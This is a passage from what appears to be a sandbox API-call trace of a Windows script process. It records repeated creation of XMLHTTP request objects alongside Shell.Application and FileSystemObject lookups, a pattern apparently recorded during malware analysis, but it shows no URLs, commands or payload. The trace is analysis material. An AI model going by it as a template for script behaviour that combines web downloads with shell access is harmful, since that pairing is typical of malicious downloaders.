	[0422.456] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0422.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0422.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0422.456] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0422.456] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0422.456] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0422.456] SysStringLen (param_1=0x0) returned 0x0
	[0422.456] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0422.457] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0422.457] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0422.457] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0422.457] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0422.457] ??2@YAPEAX_K@Z () returned 0x62f350
	[0422.457] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0422.457] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0422.457] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0422.457] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0422.457] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0422.457] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0422.457] SysStringLen (param_1=0x0) returned 0x0
	[0422.457] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0422.592] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0422.592] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0422.592] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0422.592] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0422.592] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0422.592] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0423.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0423.145] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0423.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0423.147] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0423.147] SysStringLen (param_1=0x0) returned 0x0
	[0423.147] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0423.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0423.147] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0423.147] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0423.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0423.147] ??2@YAPEAX_K@Z () returned 0x62f330
	[0423.147] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0423.147] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0423.147] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0423.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0423.147] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0423.147] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0423.148] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0423.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0423.150] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0423.150] SysStringLen (param_1=0x0) returned 0x0
	[0423.150] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0423.150] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0423.150] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72f0) returned 0x0
	[0423.151] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0423.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0423.151] ??2@YAPEAX_K@Z () returned 0x62f310
	[0423.151] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f310) 
	[0423.151] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0423.151] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0423.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72f0) returned 0x0
	[0423.151] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72f0) returned 0x3
	[0423.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0423.151] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0423.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0423.151] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0423.151] SysStringLen (param_1=0x0) returned 0x0
	[0423.151] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0423.151] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0423.152] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0423.152] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0423.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7238) returned 0x0
	[0423.152] ??2@YAPEAX_K@Z () returned 0x62f330
	[0423.152] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7238, pUnkSite=0x62f330) 
	[0423.152] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0423.152] XMLHTTPRequest:IUnknown:Release (This=0x49c7238) returned 0x0
	[0423.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0423.152] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
	[0423.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0423.152] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7490, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0423.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0423.152] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0423.152] SysStringLen (param_1=0x0) returned 0x0
	[0423.152] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0423.152] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0423.152] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0423.153] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0423.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7358) returned 0x0
	[0423.153] ??2@YAPEAX_K@Z () returned 0x62f310
	[0423.153] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7358, pUnkSite=0x62f310) 
	[0423.153] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0423.153] XMLHTTPRequest:IUnknown:Release (This=0x49c7358) returned 0x0
	[0423.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0423.153] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0423.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0423.153] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0423.153] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0423.153] longjmp () 
	[0423.153] longjmp () 
	[0423.153] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0423.153] SysStringLen (param_1=0x0) returned 0x0
	[0423.153] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0423.154] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
